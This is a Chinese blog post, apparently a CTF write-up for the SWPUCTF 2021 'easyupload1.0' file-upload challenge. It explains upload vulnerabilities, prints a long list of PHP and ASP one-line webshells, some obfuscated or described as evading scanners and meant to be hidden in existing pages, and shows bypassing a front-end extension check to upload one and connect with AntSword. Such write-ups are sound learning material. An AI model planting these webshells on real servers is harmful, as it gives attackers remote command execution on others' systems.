[SWPUCTF 2021 新生赛]easyupload1.0

[SWPUCTF 2021 新生赛]easyupload1.0

题目来源:nssctf

题目类型:web

涉及考点:文件上传

真服了,昨天写了wp忘记传了
最近准备学一下文件上传,就拿这道题开始吧

1. 简单介绍一下文件上传漏洞

文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

  • 这里放一些常用的PHP一句话木马
<?php @eval($_POST['r00ts']);?> 
<?php phpinfo();?>
<?php @eval($_POST[cmd]);?>
<?php @eval($_REQUEST[cmd]);?>
<?php assert($_REQUEST[cmd]); ?>
<?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); ?>
<?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>

<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>

<?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

<?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

<?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>

<?php usort($_GET,'asse'.'rt');?> php环境>=<5.6才能用
<?php usort(...$_GET);?>  php环境>=5.6才能用
<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//容错代码 
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
<?$_POST['c']($_POST['cc']);?> 
<?$_POST['c']($_POST['cc'],$_POST['cc'])?> 
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O> 
<?php echo `$_GET['r']` ?> 

<script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话

<?php (])?>   上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如 index.asp里面也是可以的!

<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system ($_REQUEST[1]);?> 
加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件 的最底部不会出错!

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request (“class”)%><%execute request(“class”)'<% loop <%:%> 
无防下载表,有防下载表可尝试插入以下语句突破的一句话 

<%eval(request(“1″)):response.end%> 备份专用

2. 接下来看题目,题目给了一个上传入口,先直接传个一句话木马试试

<?php @eval($_POST['r00ts']);?>

这里需要传入.jpg文件,然后利用抓包修改成.php文件,原因是在前端对文件后缀名进行了过滤

可以看到已经上传成功了,接下来使用蚁剑连接:

因为是第一次使用蚁剑,这里说下基础配置:

因为上传的地址是upload,因此连接的url地址要写upload/muma.php(文件命名的是啥这里就写啥),连接密码就是POST里的东西,也是自己设置

连接成功后打开文件管理,在/app下找到了flag.php

  • 但这个flag是错误的,看大佬的wp说藏在phpinfo里,于是我们抓包进行POST传参:

注意抓包的路径和传入的参数

  • 因为昨天刚做过在phpinfo里找flag的题,所以我直接去Environment里面找了,果然找到了:
NSSCTF{836967f8-58dd-4fdf-b42b-9e315b5b44bc}

日期:2023.8.8

作者:y0Zero

posted @ 2023-08-09 17:20  y0Zero  阅读(1670)  评论(0编辑  收藏  举报